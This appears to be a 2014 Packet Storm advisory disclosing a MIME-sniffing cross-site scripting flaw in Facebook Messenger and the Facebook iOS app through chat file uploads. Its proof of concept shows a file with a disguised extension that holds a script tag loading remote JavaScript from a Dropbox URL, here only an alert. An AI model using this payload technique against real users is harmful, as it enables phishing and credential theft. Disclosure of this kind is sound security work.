exploit the possibilities

Facebook Messenger / App MIME Sniffing Cross Site Scripting

Facebook Messenger / App MIME Sniffing Cross Site Scripting
Posted Sep 2, 2014
Authored by William Costa

Facebook Messenger and Facebook App suffers from a cross site scripting vulnerability due to a lack of file content validation.

tags | exploit, xss
MD5 | 8ca92ad7692ff88e21475a797f9a70cd

Facebook Messenger / App MIME Sniffing Cross Site Scripting

Change Mirror Download
I. VULNERABILITY
-------------------------
Reflected XSS Attacks vulnerabilities used MIME Sniffing in Facebook
Messenger and Facebook App for iOS.

II. BACKGROUND
-------------------------
Facebook is a social networks

III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability by MIME Sniffing.
The code injection is done through chat use send file.
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the contente of file send, only
valitation of extention.
Content of file face.jjjj:
<script src="https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
</script>
Content of file face.js:
alert("Alert XSS Chat send File Facebook Messenger");






V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, , that allows the execution of arbitrary HTML/script code
to be executed in the context of the victim user's browser.
An attacker can make fake facebook site requesting the User and password to
view the contents of the file, thus having access to data of the victim.

VI. SYSTEMS AFFECTED
-------------------------
Tested IPAD iOS version 7.1.2, Facebook APP Vesion 14.0, Messenger Facebook
Version 10.0.

By William Costa
william.costa no spam gmail.com


Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close